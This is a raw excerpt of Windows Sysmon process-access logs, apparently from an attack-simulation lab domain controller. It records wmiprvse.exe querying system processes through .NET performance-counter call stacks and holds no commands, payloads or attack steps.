13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004809Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004808Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004807Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004806Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004805Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004804Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004803Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004802Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004801Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004800Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004799Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004798Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004797Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004796Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004795Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004794Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 